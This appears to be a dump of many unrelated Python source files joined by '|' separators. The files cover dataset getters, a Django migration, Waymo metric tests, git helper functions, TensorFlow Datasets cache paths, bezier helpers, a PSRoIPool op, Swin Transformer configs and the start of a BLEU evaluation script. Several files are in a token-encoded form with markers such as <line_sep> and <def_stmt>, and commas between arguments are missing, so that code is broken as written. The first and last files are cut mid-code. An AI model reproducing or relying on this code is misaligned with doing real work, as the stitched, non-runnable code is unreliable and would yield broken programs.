T)<line_sep>cam_rays=self.get_camera_rays(R)<line_sep>depth=depth.reshape(-1)<line_sep>valid_mask=(depth<l>1e5)&(depth<g>0)<line_sep>valid_depth=depth[valid_mask]<line_sep>valid_zdepth=valid_depth/self.calib_map[valid_mask]<line_sep>samples=[]<for_stmt>idx range(number)<block_start>ratio_sample=torch.rand_like(valid_zdepth)<times>1.0<line_sep>input_zdepth=valid_zdepth<times>ratio_sample<line_sep>points=self.generate_point_samples(cam_pos cam_rays[: valid_mask] input_zdepth has_zdepth_grad=<false>)<line_sep>points=points.transpose(1 0)<line_sep>sample=decode_sdf(self.decoder latent points clamp_dist=clamp_dist).squeeze(-1)<line_sep>samples.append(sample)<block_end>samples=torch.cat(samples 0)<line_sep><return>samples<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><pass><block_end> |
from chainercv.chainer_experimental.datasets.sliceable.sliceable_dataset import _as_key_indices
from chainercv.chainer_experimental.datasets.sliceable.sliceable_dataset import _is_iterable
from chainercv.chainer_experimental.datasets.sliceable import SliceableDataset


class GetterDataset(SliceableDataset):
    """A sliceable dataset class that is defined with getters.
This is a dataset class with getters.
Please refer to the tutorial for more detailed explanation.
Here is an example.
>>> class SliceableLabeledImageDataset(GetterDataset):
>>> def __init__(self, pairs, root='.'):
>>> super(SliceableLabeledImageDataset, self).__init__()
>>> with open(pairs) as f:
>>> self._pairs = [l.split() for l in f]
>>> self._root = root
>>>
>>> self.add_getter('img', self.get_image)
>>> self.add_getter('label', self.get_label)
>>>
>>> def __len__(self):
>>> return len(self._pairs)
>>>
>>> def get_image(self, i):
>>> path, _ = self._pairs[i]
>>> return read_image(os.path.join(self._root, path))
>>>
>>> def get_label(self, i):
>>> _, label = self._pairs[i]
>>> return np.int32(label)
>>>
>>> dataset = SliceableLabeledImageDataset('list.txt')
>>>
>>> # get a subset with label = 0, 1, 2
>>> # no images are loaded
>>> indices = [i for i, label in
... enumerate(dataset.slice[:, 'label']) if label in {0, 1, 2}]
>>> dataset_012 = dataset.slice[indices]
    """

    def __init__(self):
        self._keys = []
        self._getters = []
        self._return_tuple = True

    def __len__(self):
        raise NotImplementedError

    @property
    def keys(self):
        if self._return_tuple:
            return tuple(key for key, _, _ in self._keys)
        else:
            return self._keys[0][0]

    @keys.setter
    def keys(self, keys):
        self._keys = [self._keys[key_index]
                      for key_index in _as_key_indices(keys, self.keys)]
        self._return_tuple = _is_iterable(keys)

    def add_getter(self, keys, getter):
        """Register a getter function
Args:
keys (string or tuple of strings): The name(s) of data
that the getter function returns.
getter (callable): A getter function that takes an index and
returns data of the corresponding example.
        """
        self._getters.append(getter)
        if _is_iterable(keys):
            for key_index, key in enumerate(keys):
                self._keys.append((key, len(self._getters) - 1, key_index))
        else:
            self._keys.append((keys, len(self._getters) - 1, None))

    def get_example_by_keys(self, index, key_indices):
        example = []
        cache = {}
        for key_index in key_indices:
            _, getter_index, key_index = self._keys[key_index]
            if getter_index not in cache:
                cache[getter_index] = self._getters[getter_index](index)
            if key_index is None:
                example.append(cache[getter_index])
            else:
                example.append(cache[getter_index][key_index])
        return tuple(example)
|
# Generated by Django 2.2.24 on 2021-06-23 13:28
from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [
        ("events", "0001_initial"),
    ]

    operations = [
        migrations.AlterModelOptions(
            name="event",
            options={},
        ),
    ]
|
# Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for waymo_ap_metric."""<import_from_stmt>lingvo compat<as>tf<import_from_stmt>lingvo.core py_utils<import_from_stmt>lingvo.core test_utils<import_from_stmt>lingvo.tasks.car.waymo waymo_ap_metric<import_from_stmt>lingvo.tasks.car.waymo waymo_metadata<import_stmt>numpy<as>np<import_from_stmt>waymo_open_dataset label_pb2<line_sep>FLAGS=tf.flags.FLAGS<class_stmt>APTest(test_utils.TestCase)<block_start><def_stmt>testWaymoAPConfig self<block_start>metadata=waymo_metadata.WaymoMetadata()<line_sep># Use 2D metric.
config=waymo_ap_metric.BuildWaymoMetricConfig(metadata '2d' [])<line_sep>vehicle_idx=label_pb2.Label.Type.Value('TYPE_VEHICLE')<line_sep>ped_idx=label_pb2.Label.Type.Value('TYPE_PEDESTRIAN')<line_sep>cyc_idx=label_pb2.Label.Type.Value('TYPE_CYCLIST')<line_sep>thresholds_meta=metadata.IoUThresholds()<line_sep>self.assertNear(config.iou_thresholds[vehicle_idx] thresholds_meta['Vehicle'] 1e-6)<line_sep>self.assertNear(config.iou_thresholds[ped_idx] thresholds_meta['Pedestrian'] 1e-6)<line_sep>self.assertNear(config.iou_thresholds[cyc_idx] thresholds_meta['Cyclist'] 1e-6)<block_end><def_stmt>testPerfectBox self<block_start>metadata=waymo_metadata.WaymoMetadata()<line_sep>params=waymo_ap_metric.WaymoAPMetrics.Params(metadata)<line_sep>m=params.Instantiate()<line_sep># Make one update with a perfect box.
update_dict=py_utils.NestedMap(groundtruth_labels=np.array([1]) groundtruth_bboxes=np.ones(shape=(1 7)) groundtruth_difficulties=np.zeros(shape=(1)) groundtruth_num_points=<none> detection_scores=np.ones(shape=(5 1)) detection_boxes=np.ones(shape=(5 1 7)) detection_heights_in_pixels=np.ones(shape=(5 1)))<line_sep>m.Update('1234' update_dict)<line_sep>waymo_ap=m.value<line_sep>self.assertAllClose(waymo_ap 1./3.)<line_sep># Write a summary.
summary=m.Summary('foo')<line_sep># Check that both AP and APH are in the tags.
tags=[v.tag<for>v summary.value]<line_sep>self.assertIn('foo/Pedestrian/AP_LEVEL_1' tags)<line_sep>self.assertIn('foo/Pedestrian/APH_LEVEL_1' tags)<line_sep>self.assertIn('foo/Pedestrian/AP_LEVEL_2' tags)<line_sep>self.assertIn('foo/Pedestrian/APH_LEVEL_2' tags)<block_end><def_stmt>testWaymoBreakdowns self<block_start>metadata=waymo_metadata.WaymoMetadata()<line_sep>params=waymo_ap_metric.WaymoAPMetrics.Params(metadata)<line_sep>params.waymo_breakdown_metrics=['RANGE' 'VELOCITY']<line_sep>m=params.Instantiate()<line_sep># Make one update with a perfect box.
update_dict=py_utils.NestedMap(groundtruth_labels=np.array([1]) groundtruth_bboxes=np.ones(shape=(1 7)) groundtruth_difficulties=np.zeros(shape=(1)) groundtruth_num_points=<none> groundtruth_speed=np.zeros(shape=(1 2)) detection_scores=np.ones(shape=(5 1)) detection_boxes=np.ones(shape=(5 1 7)) detection_heights_in_pixels=np.ones(shape=(5 1)))<line_sep>m.Update('1234' update_dict)<line_sep># Write a summary.
summary=m.Summary('foo')<line_sep># Check that the summary value for default ap and
# a waymo breakdown version by range is the same.
<for_stmt>v summary.value<block_start><if_stmt>v.tag<eq>'foo/Vehicle/AP_LEVEL_1'<block_start>default_val=v.simple_value<block_end><elif_stmt>v.tag<eq>'foo/Vehicle/APH_LEVEL_1'<block_start>aph_default_val=v.simple_value<block_end><elif_stmt>v.tag<eq>'foo_extra/AP_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_1'<block_start>ap_bd_val_l1=v.simple_value<block_end><elif_stmt>v.tag<eq>'foo_extra/AP_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_2'<block_start>ap_bd_val_l2=v.simple_value<block_end><elif_stmt>v.tag<eq>'foo_extra/APH_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_1'<block_start>aph_bd_val_l1=v.simple_value<block_end><elif_stmt>v.tag<eq>'foo_extra/APH_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_2'<block_start>aph_bd_val_l2=v.simple_value<block_end><elif_stmt>v.tag<eq>'foo_extra/AP_VELOCITY_TYPE_VEHICLE_STATIONARY_LEVEL_1'<block_start>vbd_val_l1=v.simple_value<block_end><elif_stmt>v.tag<eq>'foo_extra/AP_VELOCITY_TYPE_VEHICLE_STATIONARY_LEVEL_2'<block_start>vbd_val_l2=v.simple_value<block_end><block_end>self.assertEqual(ap_bd_val_l1 default_val)<line_sep>self.assertEqual(ap_bd_val_l2 default_val)<line_sep>self.assertEqual(aph_bd_val_l1 aph_default_val)<line_sep>self.assertEqual(aph_bd_val_l2 aph_default_val)<line_sep>self.assertEqual(vbd_val_l1 default_val)<line_sep>self.assertEqual(vbd_val_l2 default_val)<line_sep># Check that eval classes not evaluated are not present.
tags=[v.tag<for>v summary.value]<line_sep>self.assertNotIn('foo_extra/APH_RANGE_TYPE_SIGN_[0, 30)_LEVEL_1' tags)<line_sep>self.assertNotIn('foo_extra/APH_RANGE_TYPE_SIGN_[0, 30)_LEVEL_2' tags)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>tf.test.main()<block_end> |
import click
from click.testing import CliRunner

from aiotasks.actions.cli import worker
import aiotasks.actions.cli


def _launch_aiotasks_worker_in_console(blah, **kwargs):
    click.echo("ok")


def test_cli_worker_runs_show_help():
    runner = CliRunner()
    result = runner.invoke(worker)

    assert 'Usage: worker [OPTIONS]' in result.output


def test_cli_worker_runs_ok(monkeypatch):
    # Patch the launch of: launch_aiotasks_worker_in_console
    aiotasks.actions.cli.launch_aiotasks_worker_in_console = _launch_aiotasks_worker_in_console

    runner = CliRunner()
    result = runner.invoke(worker, ["-A", "package"])

    assert 'ok' in result.output
|
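A hypothetical variant of the patching above that uses the `monkeypatch` fixture the test already receives; the test name is illustrative, and `monkeypatch.setattr` restores the original attribute automatically after the test.

def test_cli_worker_runs_ok_with_monkeypatch(monkeypatch):
    monkeypatch.setattr(aiotasks.actions.cli, "launch_aiotasks_worker_in_console",
                        _launch_aiotasks_worker_in_console)

    result = CliRunner().invoke(worker, ["-A", "package"])

    assert 'ok' in result.output
|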
<import_stmt>os.path<as>mod_path<import_stmt>sys<as>mod_sys<import_stmt>subprocess<import_from_stmt>typing *<def_stmt>assert_in_git_repository <arrow><none><block_start>success,lines=execute_git('status' output=<false>)<if_stmt><not>success<block_start>print('Not a git repository!!!')<line_sep>mod_sys.exit(1)<block_end><block_end><def_stmt>execute_command cmd:Union[str List[str]] output:bool=<true> prefix:str='' grep:Optional[str]=<none><arrow>Tuple[bool str]<block_start>result=''<line_sep>command=cmd<if>type(cmd)<is>list<else>cmd.split(' ')# type: ignore
p=subprocess.Popen(command stdout=subprocess.PIPE stderr=subprocess.STDOUT bufsize=-1)<line_sep>(cmdout cmderr)=p.communicate()<if_stmt>cmdout<is><none><block_start><return>(0 "")<block_end><for_stmt>line cmdout.decode('utf-8').split('\n')<block_start>output_line=prefix+('%s'%line).rstrip()+'\n'<if_stmt><not>grep<or>grep<in>output_line<block_start><if_stmt>output<and>output_line<block_start>print(output_line.rstrip())<line_sep>mod_sys.stdout.flush()<block_end>result<augadd>output_line<block_end><block_end><return>(<not>p.returncode result)<block_end><def_stmt>execute_git command:str output:bool=<true> prefix:str='' grep:str=""<arrow>Tuple[bool str]<block_start><return>execute_command('git %s'%command output prefix grep)<block_end><def_stmt>get_branches remote:bool=<false> all:bool=<false> merged:bool=<false> no_merged:bool=<false><arrow>List[str]<block_start>git_command='branch'<if_stmt>remote<block_start>git_command<augadd>' -r'<block_end><if_stmt>all<block_start>git_command<augadd>' -a'<block_end><if_stmt>merged<is><true><block_start>git_command<augadd>' --merged'<block_end><if_stmt>no_merged<is><true><block_start>git_command<augadd>' --no-merged'<block_end>success,result=execute_git(git_command output=<false>)<assert_stmt>success<assert_stmt>result<def_stmt>_filter_branch branch:str<arrow>str<block_start><if_stmt>'*'<in>branch# Current branch:
<block_start><return>branch.replace('*' '').strip()<block_end><elif_stmt>'->'<in>branch# Branch is an alias
<block_start><return>branch.split('->')[0].strip()<block_end><elif_stmt>'HEAD detached at'<in>branch<block_start><return>'HEAD'<block_end><return>branch.strip()<block_end>lines=result.strip().split('\n')<line_sep>lines=list(map(_filter_branch lines))<line_sep>lines=[line<for>line lines<if>line]<line_sep><return>lines<block_end><def_stmt>delete_branch branch:str force:bool=<false><arrow><none><block_start><if_stmt>branch.startswith('remotes/')<block_start><if_stmt>branch.startswith('remotes/')<block_start>branch=branch.replace('remotes/' '')<block_end>parts=branch.split('/')<if_stmt>len(parts)<ge>2<block_start>origin_name,branch_name=parts[0] "/".join(parts[1:])<line_sep>execute_git('push %s :%s'%(origin_name branch_name))<block_end><else_stmt><block_start>print('Don\'t know how to delete %s'%branch)<block_end><block_end><else_stmt><block_start>execute_git('branch %s %s'%('-D'<if>force<else>'-d' branch))<block_end><block_end><def_stmt>get_config_properties <arrow>Dict[str str]<block_start>executed,output=execute_git('config -l' output=<false>)<if_stmt><not>executed<block_start>print('Error retrieving git config properties')<line_sep>mod_sys.exit(1)<block_end>result={}<line_sep>lines=output.split('\n')<for_stmt>line lines<block_start><if_stmt>'='<in>line<block_start>pos=line.find('=')<line_sep>key=line[0:pos].strip().lower()<line_sep>value=line[pos+1:].strip()<line_sep>result[key]=value<block_end><block_end><return>result<block_end><def_stmt>is_changed <arrow>bool<block_start>""" Checks if current project has any noncommited changes. """<line_sep>executed,changed_lines=execute_git('status --porcelain' output=<false>)<line_sep>merge_not_finished=mod_path.exists('.git/MERGE_HEAD')<line_sep><return>cast(bool changed_lines.strip()<or>merge_not_finished)<block_end><def_stmt>get_git_sha1 branch_name:str<arrow>str<block_start>success,sha1=execute_git('log -1 %s --format=%%H --'%branch_name output=<false>)<if_stmt><not>success<block_start><raise>Exception(f'Invalid branch {branch_name}')<block_end><return>sha1.strip()<block_end><def_stmt>distance_to_commit commit_1:str commit_2:str<arrow>int<block_start>success,log=execute_git(f'rev-list {commit_1}..{commit_2} --count' output=<false>)<if_stmt><not>success<block_start><raise>Exception(f'Error calculating distance between {commit_1}..{commit_2}')<block_end><return>int(log)<block_end> |
from allauth.socialaccount.providers.oauth2.urls import default_urlpatterns

from .provider import TwitchProvider

urlpatterns = default_urlpatterns(TwitchProvider)
|
# coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cache utils.
The cache (default to `~/.cache/tensorflow_datasets/`) is used for:
* The community dataset index list (cached in
`<cache_dir>/community-datasets-list.jsonl` from
`gs://tfds-data/community-datasets-list.jsonl`)
* The installed dataset packages (downloaded from github and installed in
`<cache_dir>/modules/tfds_community/`).
"""
import os
import sys

from tensorflow_datasets.core import utils
from tensorflow_datasets.core.utils import type_utils


def _default_cache_dir() -> type_utils.ReadWritePath:
  """Returns the default cache directory."""
  if 'TFDS_CACHE_DIR' in os.environ:
    path = os.environ['TFDS_CACHE_DIR']
  elif 'XDG_CACHE_HOME' in os.environ:
    path = os.path.join(os.environ['XDG_CACHE_HOME'], 'tensorflow_datasets')
  else:
    path = os.path.join('~', '.cache', 'tensorflow_datasets')
  return utils.as_path(path).expanduser()


@utils.memoize()
def cache_path() -> type_utils.ReadWritePath:
  """Returns the path to the TFDS cache."""
  path = _default_cache_dir()
  path.mkdir(parents=True, exist_ok=True)
  return path


@utils.memoize()
def module_path() -> type_utils.ReadWritePath:
  """Returns the path to the cached TFDS dynamically installed modules.
Calling this function will update `sys.path` so modules installed in this
directory can be imported.
Returns:
module_path: The path to the dynamically installed modules.
  """
  path = cache_path() / 'modules/'
  path.mkdir(parents=True, exist_ok=True)
  # Add the `~/.cache/tensorflow_datasets/modules/` to `sys.path`
  sys.path.append(os.fspath(path))
  return path
|
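A hypothetical override of the cache location built on the helpers above; the path is an example only, and because `cache_path()`/`module_path()` are memoized the variable has to be set before their first call in the process.

import os

os.environ['TFDS_CACHE_DIR'] = '/data/tfds_cache'  # hypothetical path

print(cache_path())   # -> /data/tfds_cache
print(module_path())  # -> /data/tfds_cache/modules (also appended to sys.path)
|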
from django.conf import settings


def google_analytics(request):
    return {'google_analytics': settings.GOOGLE_ANALYTICS}
|
try:
    t = int(input())
    for i in range(t):
        n = int(input())
        a = list(map(int, input().split()))
        set1 = list(set(a))
        print(len(set1))
except:
    pass
|
# terrascript/data/oraclepaas.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:24:00 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.data.oraclepaas
#
# instead of
#
# >>> import terrascript.data.hashicorp.oraclepaas
#
# This is only available for 'official' and 'partner' providers.
from terrascript.data.hashicorp.oraclepaas import *
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper methods for B |eacute| zier curves.
The functions provided by this module have a Cython speedup with the
exact same interface which calls out to a Fortran implementation. The speedup
will be used if the extension can be built.
"""
from bezier.hazmat import curve_helpers

try:
    from bezier import _speedup
except ImportError:  # pragma: NO COVER
    _speedup = None


# pylint: disable=invalid-name
if _speedup is None:  # pragma: NO COVER
    subdivide_nodes = curve_helpers.subdivide_nodes
    evaluate_multi = curve_helpers.evaluate_multi
    evaluate_multi_barycentric = curve_helpers.evaluate_multi_barycentric
    compute_length = curve_helpers.compute_length
    elevate_nodes = curve_helpers.elevate_nodes
    specialize_curve = curve_helpers.specialize_curve
    evaluate_hodograph = curve_helpers.evaluate_hodograph
    get_curvature = curve_helpers.get_curvature
    newton_refine = curve_helpers.newton_refine
    locate_point = curve_helpers.locate_point
    reduce_pseudo_inverse = curve_helpers.reduce_pseudo_inverse
    full_reduce = curve_helpers.full_reduce
else:
    subdivide_nodes = _speedup.subdivide_nodes_curve
    evaluate_multi = _speedup.evaluate_multi
    evaluate_multi_barycentric = _speedup.evaluate_multi_barycentric
    compute_length = _speedup.compute_length
    elevate_nodes = _speedup.elevate_nodes
    specialize_curve = _speedup.specialize_curve
    evaluate_hodograph = _speedup.evaluate_hodograph
    get_curvature = _speedup.get_curvature
    newton_refine = _speedup.newton_refine_curve
    locate_point = _speedup.locate_point_curve
    reduce_pseudo_inverse = _speedup.reduce_pseudo_inverse
    full_reduce = _speedup.full_reduce
# pylint: enable=invalid-name
|
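A brief usage sketch of the helpers re-exported above; the quadratic control points and the dimension-by-node, Fortran-ordered layout are assumptions about how this library stores curves, not values taken from the original module.

import numpy as np

nodes = np.asfortranarray([
    [0.0, 1.0, 2.0],
    [0.0, 2.0, 0.0],
])

length = compute_length(nodes)        # arc length of the quadratic curve
left, right = subdivide_nodes(nodes)  # de Casteljau split of the curve at s = 0.5
|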
# Import from pod
# Import from third library
<import_stmt>torch<import_from_stmt>torch.autograd Function<import_from_stmt>up.utils.general.log_helper default_logger<as>logger<line_sep># Import from local
<import_from_stmt>.._C psroi_pooling<class_stmt>PSRoIPoolFunction(Function)<block_start>@staticmethod<def_stmt>symbolic g features rois group_size spatial_scale output_dim<block_start><return>g.op("PSRoiPool" features rois output_dim_i=output_dim group_size_i=group_size spatial_scale_f=spatial_scale)<block_end>@staticmethod<def_stmt>forward self features rois group_size spatial_scale output_dim<block_start>self.save_for_backward(features rois)<line_sep>self.group_size=group_size<line_sep>self.spatial_scale=spatial_scale<line_sep>self.output_dim=output_dim<line_sep>batch_size,num_channels,data_height,data_width=features.size()<line_sep>num_rois=rois.shape[0]<line_sep>output=features.new(num_rois self.output_dim self.group_size self.group_size).zero_()<line_sep>mapping_channel=torch.IntTensor(num_rois self.output_dim self.group_size self.group_size).zero_()<line_sep>forward_fn=psroi_pooling.forward_cuda<if_stmt><not>features.is_cuda<block_start>logger.warning('---CPU version of PSRoIPooling is a dummpy function, which is used to support tocaffe')<line_sep>forward_fn=psroi_pooling.forward_cpu<block_end><else_stmt><block_start>mapping_channel=mapping_channel.cuda()<block_end>forward_fn(self.group_size self.group_size self.output_dim self.spatial_scale features rois output mapping_channel)<line_sep>self.mapping_channel=mapping_channel<line_sep><return>output<block_end>@staticmethod<def_stmt>backward self grad_output<block_start>grad_output=grad_output.data<line_sep>feature,rois=self.saved_tensors<assert_stmt>grad_output.is_cuda<line_sep>batch_size,num_channels,data_height,data_width=feature.shape<line_sep>grad_input=grad_output.new(batch_size num_channels data_height data_width).zero_()<line_sep>psroi_pooling.backward_cuda(self.group_size self.group_size self.output_dim self.spatial_scale grad_output rois grad_input self.mapping_channel)<line_sep><return>grad_input <none> <none> <none> <none><block_end><block_end><class_stmt>PSRoIPool(torch.nn.Module)<block_start><def_stmt>__init__ self group_size output_dim=<none> spatial_scale=<none><block_start>super(PSRoIPool self).__init__()<line_sep>self.group_size=int(group_size)<if_stmt>spatial_scale<is><not><none><block_start>logger.warning('`spatial_scale` is deprecated in PSRoIPool.__ini__, '<concat>'we move `spatial_scale` to `forward` arguments `stride` for flexiability')<block_end><if_stmt>output_dim<is><not><none><block_start>logger.warning('`output_dim` is deprecated in PSRoIPool.__ini__, '<concat>'we will calculate `output_dim` by chanels of pooled '<concat>'`features` and `group_size` dynamically')<block_end><block_end><def_stmt>forward self rois features stride<block_start>"""
Arguments:
rois: [N, >=5] (batch_idx, x1, y1, x2, y2)
Notes:
1. rois must be N*5 dim
2. in fp16 mode, feature.dtype is fp16, but rois.dtype may not
3. tensor must be contiguous before passing to the C code
"""<line_sep>rois=rois[: :5].contiguous().to(dtype=features.dtype)<line_sep>features=features.contiguous()<assert_stmt>rois.shape[1]<eq>5 rois.shape<line_sep>spatial_scale=1.0/stride<line_sep>output_dim=features.shape[1]<floordiv>self.group_size<power>2<line_sep># In ONNX context, tensor.shape is type of tensor, while symbolic of PSRoIPool requires
# the argumement of output_dim is int
<if_stmt>torch.is_tensor(output_dim)<block_start>output_dim=output_dim.item()<block_end><assert_stmt>self.group_size<power>2<times>output_dim<eq>features.shape[1]<line_sep><return>PSRoIPoolFunction.apply(features rois self.group_size spatial_scale output_dim)<block_end><def_stmt>__repr__ self<block_start>s='{name} ({group_size})'<line_sep><return>s.format(name=self.__class__.__name__ **self.__dict__)<block_end>@classmethod<def_stmt>from_params cls params<block_start>group_size=params['pool_size']<line_sep><return>cls(group_size)<block_end><block_end> |
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
IMAGENET_DEFAULT_MEAN=[0.485 0.456 0.406]<line_sep>IMAGENET_DEFAULT_STD=[0.229 0.224 0.225]<def_stmt>_cfg url='' **kwargs<block_start><return>{'url':url 'num_classes':1000 'input_size':(3 224 224) 'pool_size':<none> 'crop_pct':.9 'interpolation':'bicubic' 'fixed_input_size':<true> 'mean':IMAGENET_DEFAULT_MEAN 'std':IMAGENET_DEFAULT_STD 'first_conv':'patch_embed.proj' 'classifier':'head' **kwargs}<block_end>model_cfgs={# patch models (my experiments)
'swin_base_patch4_window12_384':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window12_384_22kto1k.pth' input_size=(3 384 384) crop_pct=1.0) 'swin_base_patch4_window7_224':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window7_224_22kto1k.pth' ) 'swin_large_patch4_window12_384':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window12_384_22kto1k.pth' input_size=(3 384 384) crop_pct=1.0) 'swin_large_patch4_window7_224':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window7_224_22kto1k.pth' ) 'swin_small_patch4_window7_224':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_small_patch4_window7_224.pth' ) 'swin_tiny_patch4_window7_224':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_tiny_patch4_window7_224.pth' ) 'swin_base_patch4_window12_384_in22k':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window12_384_22k.pth' input_size=(3 384 384) crop_pct=1.0 num_classes=21841) 'swin_base_patch4_window7_224_in22k':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window7_224_22k.pth' num_classes=21841) 'swin_large_patch4_window12_384_in22k':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window12_384_22k.pth' input_size=(3 384 384) crop_pct=1.0 num_classes=21841) 'swin_large_patch4_window7_224_in22k':_cfg(url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window7_224_22k.pth' num_classes=21841) }<def_stmt>build_configs name **kwargs<block_start>config=model_cfgs[name]<line_sep>model_architectures={'swin_base_patch4_window12_384':dict(patch_size=4 window_size=12 embed_dim=128 depths=(2 2 18 2) num_heads=(4 8 16 32) **kwargs) 'swin_base_patch4_window7_224':dict(patch_size=4 window_size=7 embed_dim=128 depths=(2 2 18 2) num_heads=(4 8 16 32) **kwargs) 'swin_large_patch4_window12_384':dict(patch_size=4 window_size=12 embed_dim=192 depths=(2 2 18 2) num_heads=(6 12 24 48) **kwargs) 'swin_large_patch4_window7_224':dict(patch_size=4 window_size=7 embed_dim=192 depths=(2 2 18 2) num_heads=(6 12 24 48) **kwargs) 'swin_small_patch4_window7_224':dict(patch_size=4 window_size=7 embed_dim=96 depths=(2 2 18 2) num_heads=(3 6 12 24) **kwargs) 'swin_tiny_patch4_window7_224':dict(patch_size=4 window_size=7 embed_dim=96 depths=(2 2 6 2) num_heads=(3 6 12 24) **kwargs) 'swin_base_patch4_window12_384_in22k':dict(patch_size=4 window_size=12 embed_dim=128 depths=(2 2 18 2) num_heads=(4 8 16 32) **kwargs) 'swin_base_patch4_window7_224_in22k':dict(patch_size=4 window_size=7 embed_dim=128 depths=(2 2 18 2) num_heads=(4 8 16 32) **kwargs) 'swin_large_patch4_window12_384_in22k':dict(patch_size=4 window_size=12 embed_dim=192 depths=(2 2 18 2) num_heads=(6 12 24 48) **kwargs) 'swin_large_patch4_window7_224_in22k':dict(patch_size=4 window_size=7 embed_dim=192 depths=(2 2 18 2) num_heads=(6 12 24 48) **kwargs)}<line_sep><return>model_architectures[name] config<block_end> |
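A short illustration of how build_configs above is meant to be consumed; the model name must be one of the keys defined in model_cfgs, and the two return values are the architecture hyper-parameters and the pretrained-weight metadata.
arch, cfg = build_configs('swin_tiny_patch4_window7_224')

print(cfg['url'])                                # pretrained checkpoint location
print(arch['embed_dim'], arch['depths'], arch['num_heads'])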
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
<import_stmt>time<import_stmt>sys<import_stmt>numpy<as>np<import_stmt>unicodedata<import_stmt>six<import_stmt>re<import_stmt>tensorflow<as>tf<import_from_stmt>absl app<import_from_stmt>argparse ArgumentParser<import_stmt>pandas<as>pd<import_from_stmt>utils tokenizer<import_from_stmt>utils.tokenizer Subtokenizer<import_from_stmt>utils metrics<line_sep>flags=tf.compat.v1.flags<line_sep>FLAGS=flags.FLAGS<line_sep>flags.DEFINE_integer("batch_size" 64 "run batch size")<line_sep>flags.DEFINE_string("input_graph" <none> "The path of input model file.")<line_sep>flags.DEFINE_string("inputs_file" <none> "File saved to an output file.")<line_sep>flags.DEFINE_string("reference_file" <none> "File containing reference translation.")<line_sep>flags.DEFINE_string("vocab_file" <none> "Path to subtoken vocabulary file.")<line_sep>flags.DEFINE_string("config" <none> "Config json file")<line_sep>flags.DEFINE_string("output_model" <none> "The output model of the quantized model.")<line_sep>flags.DEFINE_string("mode" "tune" "One of three options: 'benchmark'/'accuracy'/'tune'.")<line_sep>flags.DEFINE_integer("iters" -1 "The iteration used for benchmark.")<class_stmt>UnicodeRegex(object)<block_start><def_stmt>__init__ self<block_start>punctuation=self.property_chars("P")<line_sep>self.nondigit_punct_re=re.compile(r"([^\d])(["+punctuation+r"])")<line_sep>self.punct_nondigit_re=re.compile(r"(["+punctuation+r"])([^\d])")<line_sep>self.symbol_re=re.compile("(["+self.property_chars("S")+"])")<block_end><def_stmt>property_chars self prefix<block_start><return>"".join(six.unichr(x)<for>x range(sys.maxunicode)<if>unicodedata.category(six.unichr(x)).startswith(prefix))<block_end><block_end>uregex=UnicodeRegex()<def_stmt>bleu_tokenize string<block_start>string=uregex.nondigit_punct_re.sub(r"\1 \2 " string)<line_sep>string=uregex.punct_nondigit_re.sub(r" \1 \2" string)<line_sep>string=uregex.symbol_re.sub(r" \1 " string)<line_sep><return>string.split()<block_end><class_stmt>bleu(object)<block_start><def_stmt>__init__ self<block_start>self.translations=[]<line_sep>self.labels=[]<block_end><def_stmt>reset 